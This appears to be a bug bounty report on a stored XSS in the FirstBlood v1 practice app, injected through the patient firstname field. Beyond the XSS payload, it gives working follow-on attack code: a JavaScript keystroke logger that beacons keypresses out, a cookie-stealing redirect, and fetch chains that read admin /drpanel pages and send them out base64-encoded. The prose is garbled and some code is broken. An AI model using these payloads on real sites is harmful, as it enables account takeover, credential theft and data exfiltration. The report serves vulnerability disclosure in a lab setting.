FirstBlood-#200Script inclusion leads to phishing,ato,monitoring of clicks of the user [sxss] and intresting vulnerablity
This issue was discovered on FirstBlood v1

On 2021-05-11, thesecguy Level 2 reported:


I have learned a lot exploiting this bug which is a stored xss but with a script inclusion


visit submit random data in every field expect in firstname submit this payload below exactly

The shortest xss payload <script/src=//></</script>script>

Now login to admin account visit

Now you'll get popup and if you check the source you'll be presented with below code

For safeguarding reasons please do not leave this alert on your screen when unattended! Use information below to verify patients over the phone.

Name: <script/src=//> </script> balu
Address: alsdfj lkasdjf
Telephone: lkasdjflk
DOB: 34

exploit working

share the url with any victim you want to exploit it works on nodadmin and admin people too but the user should be logged in

an xss popup


In the above payload it is just only alert

But we can do what ever we want like phishing, key stroke logging, account takeover by cookie stealing becuase there is no http only tag for cookie and can also able to steal appointments and entire source code with small snippets with ajax snippets fetch('//drpanel/index.php') and stealing the response and also for fetch('/drpanel/cancelled.php') and steling thre response with the .then`response =>response.text()`.then`data => console.log(data) why this fetch request work means becuase it is giviing ajax query to its own endpoints and so it work smoothly

so it would be any easy attack

The site accepting any script there is no cors here which made this attack possible

Becuase of script inclusion we can entirely attack the site as a bit attacker . tq for the hackevent sean


If you want to log keystrokes include this in your script eg: //

var buffer = [];
var url = ''
document.onkeypress = function(e) {
    var timestamp = | 0;
    var stroke = {
        k: e.key,
        t: timestamp
window.setInterval(function() {
    if (buffer.length > 0) {
        var data = encodeURIComponent(JSON.stringify(buffer));
        new Image().src = url + data;
        buffer = [];
}, 200);



window.location.href = ""+document.cookie

stealing source code

Here i share a script which helps to steal all the source code of the admin user which have potential data which is included in // will be executed successsfully

    fetch("/drpanel/cancelled.php").then(response => response.text()).then(data => window.location.href=""+btoa(data))
    fetch("/drpanel/index.php").then(response => response.text()).then(data => window.location.href=""+btoa(data))

final note

script endpoint is mostly dangerous and can change the content of the site

P2 High

Endpoint: /drpanel/index.php

Parameter: firstname and lastname

Payload: <script/src=//></</script>script>

FirstBlood ID: 10
Vulnerability Type: Stored XSS

When creating an appointment, it is possible to get stored XSS /drapi/query.php via the patients name